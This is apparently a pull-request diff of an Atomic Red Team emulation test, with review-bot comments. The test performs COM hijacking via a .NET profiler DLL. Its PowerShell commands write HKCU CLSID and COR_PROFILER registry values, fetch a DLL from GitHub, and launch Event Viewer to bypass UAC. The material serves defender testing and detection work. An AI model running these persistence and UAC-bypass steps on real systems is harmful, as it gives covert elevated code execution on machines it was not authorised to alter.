Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
T1090:
technique:
x_mitre_data_sources:
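Review bot: the `description:` of the new atomic test names the profiler DLL `atomicNotepad.dll`, but the `file_name` default and the `get_prereq_command` download `T1122x64.dll`; use one name so the on-disk artifact a defender hunts for matches the documentation. In the `executor` block, `-Value #{file_name}` on the `New-Item ... InprocServer32` and `COR_PROFILER_PATH` lines is unquoted while `COR_PROFILER` is quoted; if `PathToAtomicsFolder` expands to a path containing spaces the argument will be split, so write `-Value "#{file_name}"` in both places. The `cleanup_command` removes the CLSID key and the three `COR_*` values but leaves the `mmc.exe` and `notepad.exe` processes started by the test running; either stop them in cleanup or state in the description that they remain.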
+67
@@ -0,0 +1,67 @@
# T1122 - Component Object Model Hijacking
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1122)
<blockquote>The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.</blockquote>
## Atomic Tests
- [Atomic Test #1 - COM Hijack Leveraging .NET profiler DLL](#atomic-test-1---com-hijack-leveraging-net-profiler-dll)
<br/>
## Atomic Test #1 - COM Hijack Leveraging .NET profiler DLL
Creates environment variables and CLSID to enable a .NET profiler. The profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process. Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
**Supported Platforms:** Windows
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_name | profiler DLL | Path | PathToAtomicsFolder&#92;T1122&#92;bin&#92;T1122x64.dll|
| clsid_guid | custom clsid guid | String | {09108e71-974c-4010-89cb-acf471ae9e2c}|
#### Attack Commands: Run with `powershell`!
```powershell
Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
Start-Sleep 5
```
#### Cleanup Commands:
```powershell
Write-Host "Removing registry keys" -ForegroundColor Cyan
Remove-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}" -Recurse -Force
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -Force | Out-Null
Remove-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -Force | Out-Null
```
#### Dependencies: Run with `powershell`!
##### Description: #{file_name} must be present
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_name}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1122/bin/T1122x64.dll" -OutFile "#{file_name}"
```
<br/>
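Review bot: this file is generated from the YAML, so the `atomicNotepad.dll` versus `T1122x64.dll` mismatch in the test description should be corrected in the source YAML rather than here. In the Inputs table, the `clsid_guid` description `custom clsid guid` is too thin: the value is written verbatim into both the `HKCU:\Software\Classes\CLSID\` key path and the `COR_PROFILER` environment value, so the description should say a supplied value must keep the brace form of the default. The Cleanup Commands section would also help defenders replaying this test if it stated that the `COR_*` values in `HKCU:\Environment` persist for the user until cleanup runs, which the description already implies when it says the profiler DLL executes each time the CLR is loaded.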